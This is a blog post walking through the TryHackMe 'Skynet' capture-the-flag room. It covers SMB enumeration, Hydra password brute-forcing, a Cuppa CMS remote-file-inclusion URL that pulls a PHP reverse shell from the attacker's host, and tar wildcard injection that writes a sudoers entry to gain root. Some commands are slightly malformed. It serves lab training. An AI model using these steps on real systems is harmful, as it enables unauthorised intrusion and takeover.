DEV Community πŸ‘©β€πŸ’»πŸ‘¨β€πŸ’»

DEV Community πŸ‘©β€πŸ’»πŸ‘¨β€πŸ’» is a community of 963,673 amazing developers

We're a place where coders share, stay up-to-date and grow their careers.

Create account Log in
Cover image for Skynet: The Ultimate Terminator CTF Guide πŸ€–
christine
christine

Posted on

Skynet: The Ultimate Terminator CTF Guide πŸ€–

Terminator? I don't even know her! (Enter 90's laugh track here). No but seriously, the Skynet Try Hack Me CTF was so much fun and it was challenging, and so I had to write a write-up on it! When you're ready, put up your imaginary Terminator posters, and let's "get back" to it! πŸ˜†

Skynet CTF

Just a quick note before we start. If you run the IP address of your given machine in the browser, you are met with a "search engine" that does not work. I just wanted to get it out of the way before we start, because this page is useless and I don't want to leave you wondering.
Skynet CTF
Skynet CTF


What is Miles password for his emails?

Before we get crackalacking at Miles' emails, we need to do some basic enumeration. Let's start with an nmap scan to see what services are running on our open ports. Let's take note of our Samba smbd workgroup that is running, as this means we can exploit it via smbclient!

nmap -sV -Pn <your machine IP>
Skynet CTF

Let's go ahead and scan for workgroup shares using smbclient.
smbclient -L \\\\<your machine IP>
Skynet CTF

We can identify two important shares: milesdyson and anonymous. When we try to log in with milesdyson without a password/username we get an access denies status, yet, we can log in to anonymous this way.
smbclient //10.10.58.198/anonymous -U " "%" "
Skynet CTF
Skynet CTF

When we read the attention.txt file from anonymous's share we can see that all users had to change their passwords. When we read the logs we can see that it contains all the changed passwords! (Only log1.txt contains any data. Log2 and 3 have no data).
Skynet CTF
Skynet CTF
Skynet CTF
Skynet CTF

Copy the data from logs1.txt into a .txt file on your Desktop, or download it from smb and copy it. Then create a file named users.txt in the same directory as your log1.txt and insert one value into it: "Miles".
Skynet CTF
Skynet CTF
Skynet CTF

Now we can use Hydra to brute force Miles's password.

export ip=<your machine IP>
hydra -L users.txt -P log1.txt $ip smb -V -f

Skynet CTF

Tada! We have our password!
Skynet CTF


What is the hidden directory?

Okay, before we continue, let's run a gobuster scan to see which directories we can navigate to.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small-txt -u <your machine IP> -t 50
Skynet CTF

From there on, we can navigate to /administrator in our browser. We are met with a SquirrelMain Login page.
Skynet CTF

Let's see if we can log in with the credentials username: milesdyson, password: cyborg007haloterminator. Success!
Skynet CTF
Skynet CTF

If we read the seranakogan@skynet emails, we realize it's useless binary code. The important email is from skynet@skynet as it contains Miles' smbclient password!
Skynet CTF
Skynet CTF

Let's head back to our terminal and try to log in this time with milesdyson's username and the password from the email above.
smbclient //<your machine IP>/milesdyson -U "milesdyson"
Skynet CTF

We now have access to his smb! We are hacker masters. Let's see what is in his /notes directory.
Skynet CTF
Skynet CTF

When we read the contents of the /important.txt file, we get our hidden directory!
Skynet CTF
Skynet CTF


What is the vulnerability called when you can include a remote file for malicious purposes?

Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts. The perpetrator’s goal is to exploit the referencing function in an application to upload malware (e.g., backdoor shells) from a remote URL located within a different domain.

Skynet CTF


What is the user flag?

Okay, now the hard work starts. First things first, let's see what is in our /45kra24zxs28v3yd hidden directory.
Skynet CTF

It's just a personal page. Maybe gobuster can tell us more.
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small-txt -u http://<your machine IP>/45kra24zxs28v3yd -t 50
Skynet CTF

Let's now go to our /45kra24zxs28v3yd/administrator directory. We are met with a Cuppa CMS page (which cannot be cracked with sqli attacks such as 'admin OR 1=1--;!)
Skynet CTF

With some digging, we can see that the Cuppa CMS system is subject to remote file inclusion attacks, which means that we can upload a reverse shell to gain access to user data!
Skynet CTF

Okay, let's get our reverse shell going. To make it easy for you, you can just open up your terminal and run the following command to pull one from Pentestmonkey's GitHub.
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Skynet CTF

With our reverse-shell downloaded, we need to change two values: our IP address and our port. I keep my port at the default 1234, because I don't care. Change the IP address in your php-reverse-shell.php script to the IP address of your OPENVPN/attacker machine IP, not your lab's target machine. I did this via vim, but you can do it manually by naviagting to it if you want.
vim php-reverse-shell.php

Skynet CTF
Skynet CTF

Next up, start up a netcat listener on the port defined above (in my case, 1234).
sudo nc -nlvp 1234
Skynet CTF

Then, start up a python server which will serve our reverse shell.
sudo python3 -m http.server
Skynet CTF

Now, go back to your browser and enter the following URL (replacing the IP's with your values).
http://<machine IP>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<OPENVPN IP>:8000/php-reverse-shell.php
Skynet CTF

Notice the changes on your python server:
Skynet CTF
And your netcat listener:
Skynet CTF

Our reverse shell worked! We now have access! Now we can just navigate to user.txt and read our user flag!
Skynet CTF
Skynet CTF


What is the root flag?

We still only have www-data access. We need to find a way to get root access. Let's navigate to /home/milesdyson/backups and see what we can find.
Skynet CTF

This backup file gets a shell, navigates to the /var/www/html directory and creates a backup of everything in the directory. Read more on how we can exploit this on GTFOBins, but for now, I'm just going to show you.

*Side note: We can also find the same information as above by running the cat /etc/crontab command.
Skynet CTF

To exploit our tar, do the following:
cd /var/www/html
Skynet CTF

  1. echo 'echo "www-data ALL=(root) NOPASSWD; ALL" >> etc/sudoers' > sudo.sh
  2. touch "/var/www/html/--checkpoint-action=exec=sh sudo.sh
  3. touch "/var/www/html/--checkpoint=1
  4. sudo su

Skynet CTF

We now have root access. We can simply now cd into /root and get our flag!
Skynet CTF
Skynet CTF


Conclusion

Congratulations! You have successfully completed the Skynet CTF. I hope this was easy enough to follow, and that you had fun along the way. Until next time, happy hacking! 😊

Visit my GitHub for more.

Top comments (0)

Take a look at this:

Settings

Go to your customization settings to nudge your home feed to show content more relevant to your developer experience level. πŸ›